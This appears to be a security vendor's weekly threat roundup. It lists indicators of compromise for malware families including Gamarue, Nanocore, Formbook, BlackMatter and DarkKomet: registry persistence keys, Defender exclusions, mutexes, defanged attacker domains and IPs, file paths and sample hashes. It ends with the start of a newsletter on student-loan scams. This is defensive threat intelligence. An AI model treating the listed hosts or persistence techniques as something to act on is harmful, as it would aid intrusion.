Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-100
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-101
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-102
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-103
24
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 24
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 24
149[.]202[.]64[.]0/27 24
149[.]202[.]122[.]0/27 24
149[.]202[.]248[.]0/22 24
172[.]66[.]42[.]238 16
172[.]67[.]2[.]88 11
172[.]66[.]41[.]18 8
104[.]20[.]20[.]251 7
104[.]20[.]21[.]251 6
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 24
bitaps[.]com 24
chain[.]so 24
btc[.]blockr[.]io 24
xxxxxxxxxxxxxxxx[.]1k1dxt[.]top 24
Files and or directories created Occurrences
%TEMP%\d19ab989 24
%TEMP%\d19ab989\4710.tmp 24
%TEMP%\d19ab989\a35f.tmp 24
%LOCALAPPDATA%\Microsoft\Office\Groove1\System\CSMIPC.dat 24
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 24
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 24
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.hta 24
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.txt 24
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.jpeg 24

File Hashes

05602feb977139c96c226969997d8bc55bd47b1d142252d3ec4067591dda85f2 06cba247d80b0c6c4f5865e34ad3c33fc1ef5ffd0a285f3009d64109b0ee3d22 09768afcaa8eae74f05841e49ece1ac338318c0d5f0153c2db6cecf169718698 0fb820719ef10ee032dbb69607c6fc222fa70b64844af4f04f6eecafc08345a7 2738e1df3421ba011f912c22e19bdae3b29d1fb1092be51174da6dbbbc72df8d 3c6776dd10054cad73b50c96d62e3b7a1e807ef1f8e6355d097cac12ddccb8c8 3eb0b591eb274fa052c4a7cdfcb6c943361c9a199ca33679678791399e8b8988 4505a343015d3ef0ad624e61ecfc61e2fc499a11fc5a52911c424de5ccd99d9e 52573c863390fde5244133cc965bf2501f0eb28e7d76a9996bc300070d41941b 5ce6f26a04a5bf871018eecafb8e9f8f7284ebbd134230574da1574830d4646e 5ed48cdf13e9681085390956e25883680a6b1b4600d99608d84c126d57832025 61a051fabbf66383709e43bf77fb49c6a645f2f479eaddffa6769010cb690eea 74c864c6b31afa1db6c8d6fb2bb8860b655d3554c8d309a91d894fd210351b7e 8642a1c54c99774f7ffc1ade073f2ccc90b6e2fcacb0118f1eca20b20018d590 9d14c9d7fca8e623607986ac1c27a149dfa9a82ac267475bed080636a5870269 a8d9f9469418516807ac7ce3dbf50de0ef3e0d2ef122b2932ba908cdadc3a5bb b289bcb40e6ee16638ae7bdadb95ebbebae75568e751820d261959394d7e7f02 b86d1564a606793a4427d5795a37825eeb11296b01cae339da01ab64feb73922 c4698b067e10ecf2ac5a4e318703d46b33cbdcd9803ffabc4a9da147e5d271f1 dee4d4d3b765fc0ad7ba88d69104b5cf90a448eaf1623445033a0f671e44ffd1 e50306b8c8b4bfd52da321a30e3e28bbef41b333e5803a303791f27798a1299c e5af2faef6688bf5e5889e78357bf993e13a1d21086dfb8a4ae268ae2004068f f330c988680055316a3aa2bc341e409096517381395469a32aa369a1940e9e5c ff2c3f6c56786af4fea96c55bb7877094ea482a162050721397dda1d82246ea0

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Gamarue-9970619-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: apdsdtsh
25
<HKCU>\SOFTWARE\APPDATALOW\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 25
<HKCU>\SOFTWARE\APPDATALOW\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Install
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\system32\Authias.exe
25
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
25
<HKCU>\SOFTWARE\APPDATALOW\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.106
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{01979C6A-42FA-414C-B8AA-EEE2C8202018}.CHECK.100
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.CHECK.100
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.CHECK.101
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: NodeSlots
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: MRUListEx
1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: NodeSlots
1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: MRUListEx
1
Mutexes Occurrences
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1} 25
{<random GUID>} 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
alrthesecuritywith[.]su 25
Files and or directories created Occurrences
\{4BC230AC-2EB3-B560-90AF-42B9C45396FD} 25
%LOCALAPPDATA%\Microsoft\Windows\WER\ERC\statecache.lock 25
%System32%\Authias.exe 25

File Hashes

04deccd24c8ba2a38462b2fbe8bbdfc70484892cbc0acdb28345de60b381f17c 07f1a829b39eb8df6754b4dbed45a71d4aac24c073702254b867113661423831 10bbe562791a00906cfcf42ce12046233438aedd689b92081c546f038fd23194 12981607682dab89979727d0ec582315b1565bf94a54cb5a08a876345c8c4dd7 17692c251e7257d3ab0db70615d9b30eeaddaf6958dcbd949bbaef0ded9e5d1e 23349c88ef430438af6b527e241074c7b2d6809337879da50b098c1a809cf814 25e0618244af804051450a99c664772473615c351714ce5a3d8912573ba964df 28b34665550780af293c665483967e1ba6be39b50bf1dd5d89c716990b67df4a 292139a3d2e6ac70015b05a225072c3f9d9d0b8ac39448e12733e33dbcb8add0 3662025e620ac8a337cb2e4a53d8953de01a92ee1439c2bac9b72de592dca969 3dca218d2bb5c419d0f92c5c5b8e9a891c817bc4c52f465fc89980f9c55551e6 4a2e7161239b8f9f3f9a3fcf868aa0fca6ca4890eceb629886062b6ff729385a 5535c54c6922219bf1ed1049b5e00c5a838f632b618b80eef36ccb10852f3de2 587713ec906ea8c3e5fee650abace23a1396ca69dd183253b8a6244bdfa3d5df 5e9f652ff2720dec825edb85e2abe9466e944287b35db49ac80e9adf95df165c 66196b18fcce2381b23c5575822a79542d009f039ec872eeaa199dbe97bbb26f 67f172a5505a404b8817a9f6dabb11a7d5c0bb4cc22d60e13a38d9a70a4d8e97 855033ed08a2ab3e8e157ba89696d9d9eab207a98fde70a60752f88607394b98 8cc1dcb771e5d781e5fa805cbfc349b768996cb363ee311b97a56b7a485c50c3 8e2761a959dbf166a680e0865438238f3f857a25466fc497bb5c25c1ce7f31c6 957881f71c8988d70b6d9aef095a70bae4256adefc160374ef4db1a09cf526b7 965e0adee6460a5bf1724e9b9c37542cff44abc50a7c8cf1a7b027bd0a3c8885 99584a5853ee407a4924921589e995dbbc135014c2f7a09e0887f45dfb0ce1c4 9b6b29ddd0789e95a73c9ea48d7335555dbf20064b8459549729332044c341c2 a917ac90f8a680731d543c6f93cdb7968d750fda8a36e8f531c01b5849150cb2
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Nanocore-9970631-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
16
Mutexes Occurrences
Global\{5f88600c-86da-4b30-b45c-8e6d9614baec} 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
176[.]136[.]210[.]152 16
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
foobosmy[.]duckdns[.]org 16
Files and or directories created Occurrences
%ProgramFiles(x86)%\AGP Manager 16
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat 16
%System32%\Tasks\AGP Manager 16
%System32%\Tasks\AGP Manager Task 16
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\vftwrxguvulmqhj.eu.url 16
%APPDATA%\zvgrxunhzg 16
%APPDATA%\zvgrxunhzg\vftwrxguvulmqhj.exe 16
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 16

File Hashes

134e0430e528508da28d81b2b4ece6c9273fb568a561dd507f26d666a9eb06b3 168455cbc98ae29cafcd0dc1587c449e208e5c4f8ca59420b3667c9f698a7c51 18d834d0819c859ca179e182dfb1cdedac88857124024bfce1d0368b414f50c0 3974f625f1fb08a2174021705db11ae31aa326357728ae0b1cdf102b80eb5763 3a7b0af05b1e41786cc3ff6d99d723418b89340df9ae67837001c6a31cafb4e5 6ffff5899e1086659ba7b24a72212c8531c334643757c46d4c837460c5380693 82defa5374685563056b630ef12a46f21408cace520e72af239b47afea32e8f8 8eb183d70b6842a68d17c3950b22fabbc4f2e6de8129afddcd2fb25d03fc7df9 8fe07daa7730dc17d3fdf7134e85da268a10ce447b4c3d810d433285a35cc9e6 9b46ecd089a55744c52ac2df7882a507dd1f97a3fd40805d9eccbdbbb6aed463 9dcfa90e87d3e281a4f42d3253b1ae3386930985c0ae5f9fb29e32284d7924ce aa4adb36cd79f611579e74bc562fb5f6282bce4d9cc5699e1db2aeb7a92151de b2eb77614315a5d51d44911016d2a235324af0d403de6a55262c9b1e3e74130f dc6284d0afde4a6fb81efdb496149c6b708af0f3497e96a63162131a839879c1 dff727df396c8c954148fa078980de5e7d35a2fc000bb75905b94e6a2b7f5ff0 fd70c1b68017c46b3050ee7932d3494bca6216151ddb7fcabc36f1a0649112d3

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Formbook-9970817-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: QWbqZbz
1
Mutexes Occurrences
8-3503835SZBFHHZ 1
S-1-5-21-2580483-12441345692046 1
KP30NU33--DvY01Z 1
Global\5292ba81-3a39-11ed-9660-001517e40972 1
aenDyAN 1
Global\46b1a361-3a9e-11ed-9660-001517a459ad 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
132[.]226[.]247[.]73 2
198[.]185[.]159[.]145 1
149[.]154[.]167[.]220 1
34[.]102[.]136[.]180 1
193[.]122[.]6[.]168 1
193[.]122[.]130[.]0 1
34[.]194[.]149[.]67 1
104[.]18[.]115[.]97 1
199[.]59[.]243[.]222 1
8[.]130[.]101[.]174 1
154[.]86[.]16[.]11 1
5[.]2[.]84[.]51 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]dyndns[.]org 4
icanhazip[.]com 1
api[.]telegram[.]org 1
www[.]locallywhitstable[.]co[.]uk 1
www[.]fftblogs[.]com 1
www[.]lanyuelou[.]com 1
www[.]icishopping[.]com 1
www[.]mooreandsonsak[.]net 1
www[.]junaidsubhani[.]tech 1
mail[.]boyyem[.]com[.]tr 1
Files and or directories created Occurrences
%System32%\Tasks\Updates 3
%APPDATA%\QWbqZbz 1
%APPDATA%\QWbqZbz\QWbqZbz.exe 1
%TEMP%\tmp67A.tmp 1
%APPDATA%\Hmcuym.exe 1
%System32%\Tasks\Updates\Hmcuym 1
%TEMP%\tmpBA86.tmp 1
%APPDATA%\hmlkDX.exe 1
%System32%\Tasks\Updates\hmlkDX 1
%TEMP%\tmpA204.tmp 1
%APPDATA%\idnepTZUXvdc.exe 1
%System32%\Tasks\Updates\idnepTZUXvdc 1

File Hashes

23ed86473177a66d71540c3d3ac737aa5a4d30644af5710a54ebbb5e348fa2ee 2f2e0f257103ce5edb8051b532f00204bf882cbdec68de38c6fe8ea18390f9d2 33f83dffcd247e3fefedefb2b591598eda89c7a47892d45d3051df760b60a74a 39dd36743f55ee7885cd4033e9705a0bdf2dea44416bbdc6ec6d8384c3d4e20d 53a95222b2d47e3b44240183d0eafbc7f64bcbd88bbe61af3580ab00c5f0ff85 75ce7e84cc5c6682354ceb8edc7f0b77be3ecdda500d1b0178accd0c6158f980 9da14f5b4c27946dc53283a1773e0de7246b170e11b06be9fd8c27d095054d5b a8b84e503c11cce5530fb019cd43a0306656dd22e78eac4279a332b00430ed8d a933028fe3b25879543cc98653b7cf66d5b2ef8dfbae539bb8d284a5f9cd4c9e c1226a8fab28514368ebf700c5bb48e993c05e019e86a6db8c7ccc6105696a21 ca3afdd3df6970f8026481a1d7800d86ba9852aa6a12325330a91f05aa60fb32 da67541015af6ddee5bad1432ecc3efbf85cde69c494fd1635edbae606c4a628 e7612d60681cabff03ff3bbcb0a3985a94430375e941fd8dc58e1df8151930b1 e7cbf5001db95b997003f00bcac7ca10231130e2127470ead43f6563ebcda5fc f46e6b0438003a0daeec5461f9f01dd676b39243be432365a9c59116dc6613b5

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.BlackMatter-9970818-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: GlobalAssocChangedCounter
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: DeleteFlag
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Start
16
<HKLM>\SOFTWARE\CLASSES\ISTTBGKAF\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.YYBUFJ3PN 1
<HKLM>\SOFTWARE\CLASSES\YYBUFJ3PN 1
<HKLM>\SOFTWARE\CLASSES\YYBUFJ3PN\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.YYBUFJ3PN 1
<HKLM>\SOFTWARE\CLASSES\YYBUFJ3PN\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.WQCENFTHJ 1
<HKLM>\SOFTWARE\CLASSES\WQCENFTHJ 1
<HKLM>\SOFTWARE\CLASSES\WQCENFTHJ\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.EL7OOPHD2 1
<HKLM>\SOFTWARE\CLASSES\.WQCENFTHJ 1
<HKLM>\SOFTWARE\CLASSES\EL7OOPHD2 1
<HKLM>\SOFTWARE\CLASSES\WQCENFTHJ\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\EL7OOPHD2\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.EL7OOPHD2 1
<HKLM>\SOFTWARE\CLASSES\EL7OOPHD2\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.PF4SBMUII 1
<HKLM>\SOFTWARE\CLASSES\PF4SBMUII 1
<HKLM>\SOFTWARE\CLASSES\PF4SBMUII\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.PF4SBMUII 1
<HKLM>\SOFTWARE\CLASSES\PF4SBMUII\DEFAULTICON 1
Mutexes Occurrences
Global\{649F4E29-16CB-DD42-8922-9FFF0592856B} 1
Global\dc0d7207879493a1bb8d21571501a3c6 1
Global\03b84b750e7b0c183e81917fcc29ae2b 1
Global\68d784f599b693adb48d474d1722e8e9 1
Global\10b5e1850ed6703d7665a1adf3e368f4 1
Global\b36e0b827c995460aa570434a5517221 1
Global\2f26f3d09ccaf40de88c7029b61a3701 1
Global\9edc1729071cfeb8f9fe5f019ce0054a 1
Global\459bf63110ce888f28d3fd21adc5b730 1
Global\391396896a2cb3a40a83c4fbbe4675f3 1
Global\4c3e3cb8c6ed0804dcd51ba2638722cd 1
Global\0b32ca9dec339d33dd1bd5908acf4ce2 1
Global\4fe0268a70e4d52b0350071e277b194f 1
Global\ee7e1dcdc809584b5f8189eb071d9f66 1
Global\dfd07220109cd1dfb3c5268b025a72f3 1
Global\aa1f32bc8faeb8bbba36c0d7ccb5c0a0 1
Global\2c43957a37f865be08b53665ca3386d7 1
Global\d40e39e3314b8106bbc67d7dd3c2c4f4 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
test[.]white-datasheet[.]com 1
Files and or directories created Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-1002\desktop.ini 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I08BO8F.xlsx 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I11KHR4.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QKHLN.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I62TWBD.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I6FZORX.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IABMX83.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAJ2Y6R.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IALGTCS.xlsx 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAPSNOM.tsv 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGORSF7.xsn 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGTBBSA.accdb 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH49RPF.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH71GGR.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJKODPH.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJP965K.accdb 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKY5R3M.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IMYCSIT.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISLP722.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXLC77A.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXUL2U1.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IYSR1FU.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ2GMJW.XLSX 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R08BO8F.xlsx 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R11KHR4.doc 18
*See JSON for more IOCs

File Hashes

072d0633006eeafc77c0b0144fdac84a57fa1e4f8b96d9aa33d377bd789bc533 0c4c93e6d8473b76a094a158b6dd045904bdc78e92a0bbc6faffa222df7acb6b 12b6fead37cca9d8ca4c00c2a9d56c0a402e760ab309356f078587acb7f33396 4b8fbb8a6e46b9db78bdf5ac1aa924f901270fe369411bf431fce8a46c48ca2a 50fad26d726e0af6dbed3225267934ae9ef22b31e48fc623ce93ba582a7e6110 58729cd09a74e3f69d26653b71412f9c9285ffaba52a9beb5b6d634014c98e1a 5f4ce514d8624a72d78cae3837a197ccb44cee28d4334a7641c02beb5496b3d0 6a255e2ee08490123fa594de4fe0dac977579deb541afcf455b59de2dbe05831 7d7357e4963c7d6f087a11e22d683cacf614dc7f269c2907bbb12ae30f2b007d 84d0154234d274d9188f3f1cf1852c58cfa8020a23f99812bced94d94b7f7fe5 97002e942beed0aff194d817e98fe9fa46abb30de87e893f328f01e638bbeed1 97320395d90b28ad3d5cd0ed0416b0fe379cc0cc3d65f0b27e50db4da5902ec2 b1f44fbe839e4f53bdcf5448b637ffcab3167dc931f7f7fd39738f83ae827f5e cb537a122fb0531f14c76dfd0a87cc304c26a9ab01aec46a5fd17f268ac80854 e609bf8406b61613f3e605d277cf445059974a4c71c3edd09fffae86a3c5dbfe ece96607ae4f56f49d06aa2d790f21837beec9dfcb4aeabf69f6a80965c54fdd f02cf38d417fc6e3d5f9fc05ebf49ca37e6106ffc62ce21145888338598e0c70 f1ecb57988caf26216683b1314607f06f8bf051632ff7ba73f17c2dc9b3aafcc

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.DarkKomet-9970824-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 269 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER 268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: Type
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: Start
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: ErrorControl
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: ImagePath
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: DisplayName
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: WOW64
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: ObjectName
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER\PARAMETERS 268
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: WindowsDriver
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER\PARAMETERS
Value Name: ServiceDll
268
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
19
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
10
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
5
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CACHE\CONTENT
Value Name: CachePrefix
2
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CACHE\COOKIES
Value Name: CachePrefix
2
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CACHE\HISTORY
Value Name: CachePrefix
2
Mutexes Occurrences
IEo.txt 268
quansg 265
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
183[.]110[.]225[.]61 265
112[.]175[.]100[.]207 265
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
kanmay[.]cafe24[.]com 265
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\IEn.txt 268
%SystemRoot%\SysWOW64\WindowsDriver.dll 268

File Hashes

00eb6c2df37113f0e4003b628ee1a475c9f0400829b77299c299b1e9c95c418d 01794606a7a92c15bc8ba6502162976c823ba5d4ebc3a88467791a9db3778ef7 022f8be735d9e9d3997908a93196a52a87732dad299536c069ea85feeeea160f 02b9cd9c9154a18666fd00ed905d6da9b12009853cb9f8ce2e0cf92f87bd4135 02bad02ca69901b56f664e2885bafb295121452b5e109a3874f91f1ff4ffe23e 03412cef90bb6952d8c8972f197ee6b1ea28d295c4974d1a72b3b6d9095c1269 03906939f8b5a5ed4144066225b7386aec74d4c06b5e7cb81a2974e2c687f4da 04982dc42efe67ff4158e9fd73e30d728a29c0aaddafb6ba0e6fb0985bf89098 04b5517c234f42019237157847c6f66a9f3cdb90c218516f570bd82f259884da 0726d0dfa08cff2b64c73fcd9c62f0d422f9ad79ba8cedb571a4a01cbc821604 0801823675ac75c805fa9539faffaad12984ff7b5ca048ad246b75f3f23714c0 0920c8647741aa522efbc0f346802eb49d53364de493957d1f0e8690cbcff11c 0981457a5d19d389ff9add2ab40483b1e404ef8a08576125d602533619ef5d12 0bc073e7c6861c4cfab2a4c9beb7384bb78e102902874703ee0ccef855154155 0ca9110869dd63e0118be5c519c9e143010f4cf0ba2b1101aba59249f1285b52 0dfd8aae9b3535191eeb81ec4705625e9e57a6aa135a6c782b65ba169a80f656 0e099e281e6e3032165764a030ac73046c26b488f1fd803b64fef1fafddf2775 0eaae85e998d1617c34bc7d05db597c222f5a9fe863d995234ca7d591c8fa2fc 1131ba25f0df80d98481e1e669c5fef1e3ce0b6699e6ff0bbd40c20d0649d090 117afd55818106d5d5aad61f30f5d289666244243a41f42d7a224a89588f850b 12d5290c46b571ce5724937e85afb7d7146cbedb42c295243a55c8157fd07111 12edd2a6b213d68f391c831d4fbe706d077f01efea62a2a16db47c68df21768b 1352e8b45f865f8f5069d6c0e5e0e8239229a8bfbe000b32e6614a2d764e90ff 13d20eefb6ec5d8f0f688039c40e084665f82dc528c922c6f93a758a47befed1 14a0ae7aaf08ca98ec301d106c439cf81fbb5fb074720f2a902aa867dc91cc30
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Threat Source newsletter (Sept. 22, 2022) — Attackers are already using student loan relief for scams

22 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

We’ve seen attackers capitalize on the news time and again, from COVID-19 to U.S.-North Korea relationships and, of course, holiday shopping sales every November. 

So, I was far from surprised to see that attackers are already using U.S. President Joe Biden’s student loan forgiveness plan as a basis for scams and phishing emails.  

The Better Business Bureau and the U.S. Federal Trade Commission both released warnings over the past few weeks around fake offers, scams and website links related to the debt forgiveness plan, with which some borrowers will have up to $20,000 worth of loans forgiven. 

Many of these scams, coming via phone calls, text messages and emails, are promising to provide guaranteed access to the forgiveness program or early applications for a fee. (Hint: This will not work.) These attackers may also be looking to steal personal information by asking for things like names, addresses and the name of the college the target went to. 

I can already see the phishing emails now... “Click on this link NOW to apply for Biden’s loan forgiveness program” or “Act now so you can get your $10,000 check!” Even though I couldn’t find reports as of this week of this type of email being used to spread malware, I feel like it’s inevitable. 

This isn’t a new problem, either. A July study from the Tech Transparency Project found that nearly 12 percent of Google ads served related to student loans violated Google’s policies or had “scam characteristics.” 

